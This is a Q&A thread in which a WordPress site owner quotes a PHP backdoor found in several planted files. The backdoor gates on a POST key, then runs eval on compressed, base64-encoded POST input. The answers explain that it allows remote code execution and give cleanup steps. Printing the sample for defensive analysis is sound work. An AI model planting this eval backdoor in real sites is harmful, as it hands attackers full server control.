# How to recognize and remove malicious code on wordpress?

Tags: php

In my wordpress website, I found several brand new file containing this php code:

```
if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1"){echo "200"; exit;}
if(isset($_POST["key"]) && isset($_POST["chk"]) && 
$_POST["key"]=="long_strange_code")
eval(gzuncompress(base64_decode($_POST["chk"])));
```

What this code can do actually in Wordpress? Deleting the file is enough to remove the problem?

In the last days, the website went down several times with mysql running out of memory. Could be this the cause?

Comment: Another reason to download safely from WP repository, and buy stuff from trusted sites. Edit your PHP.ini and [disable `eval`](http://php.net/manual/en/ini.core.php#ini.disable-functions), WordPress does not use it but other plugins/themes may, just until you identify the problem.

Answer (score 2, accepted):

> What this code can do actually in Wordpress?

This code allows arbitrary execution of PHP on your server.

> Deleting the file is enough to remove the problem?

You'll need to delete all files that contain backdoor like this. Look at every file on your system and compare it to the WordPress repository.

> In the last days, the website went down several times with mysql running out of memory. Could be this the cause?

Yes. It's likely that some bad guy is using your server for nefarious deeds.

Comment: Love you so much! This php you're speaking of, where could be stored? It was sent in the POST variable chk?

Comment: The PHP could reside literally anywhere. Likely a command and control server. If your server is logging post requests, you'll likely find the culprit there. But anyone who knew the location of that code could execute any PHP they wanted.

Comment: Finally I found a file containing a (coded in eval base64_encode) full c99madsheel. I removed all file containing malicious eval, checked db content, users, changed every single password on the system, hoping it will be enough...

Answer (score 1):

Your site is already hacked. You can be sure 99%, that your site is under FULL CONTROL.

(Quote from another [**site**](https://www.protectpages.com/blog/what-should-you-do-if-your-wordpress-web-site-was-hacked/)):

> Steps you have to do (Note, if you miss any step, your site will
>   possibly remain hacked):
>
> - At first, report the malicious plugin/theme to **plugins[@]wordpress.com** and warn other about the suspicious plugins.
> - Delete that file immediately.
> - Delete all suspicious **plugins** and **themes**. Remember the list of TRUSTED plugins you have installed and TRUSTED theme name (continue
>     reading).
> - Backup database (export to PC) and delete database from MYSQL server.
> - Change password and database name of MYSQL server.
> - (Not required, but strongly recommended): Change your WP login password. If you used that password somewhere else, change everywhere
>     (because your password may have been grabbed already)
> - Backup only `wp-content/uploads` folder (if you have custom theme or something, backup it too), and delete everything from `public_html`.
> - Check `uploads` (or other folders you backed-up), if there is any `.php` or server-side files inside that, it is is clean, then put that
>     folder back to site.
> - Now you have to check your exported DATABASE(SQL) file carefully. see if there are extra/suspicious tables or EXTRA USER added, or some
>     hackable cron job created.
>     -Import the revised SQL database back to newly created database (with different username and password as I've said), but:  before importing,
>     you can replace your admin password from `wp_users` table with
>     `$P$B1oYQ3msvVDfFRDwiCY6lViBGmiXMT/` (this is example password `a`.
>     you should change it asap as you enter your site first time).
> - Reinstall clean wordpress installation on your site (if you use old version of WP, you can install OLD version).
> - Install only those 'Trusted' plugins and theme.
>
> This may be a hard process somehow, but if you want safety, you should
>   do this. Otherwise, you will still remain hacked.

Answer (score 0):

First, you need to check where the file is. Is it inside your theme folder or your plugins folder?

If it is something that came from a plugin, you'll need to check for other places where the file may have been replicated. For this, I'll suggest you:

- Uninstall all your plugins
- Install the plugins again, one after the other, in other to determine the culprit.

If the file is in the root folder, and it's not part of the core WordPress files, please delete it.

Comment: There are more than one: /timer.php, wp-admin/user/mainconfig.php, wp-includes/SimplePie/mainconfig.php, wp-content/common.php, wp-includes/SimplePie/XML/autoconf.php, wp-content/mainconfig.php, wp-content/common_.php. Wordfence recognized all of them, and surely I will delete them, but I am not sure if this is enough, what this code could be used for and if it could be the cause of mysql crashing. (Severaltimes I found also that wp-option table was marked as crashed and a myisamchk -r wp-option was necessary to restart mysql)

Comment: Well, in my opinion, anything that's not added by you, OR a plugin, that's not useful for your site may **harm** it. So, I'll suggest you delete the malicious files and tighten up your site.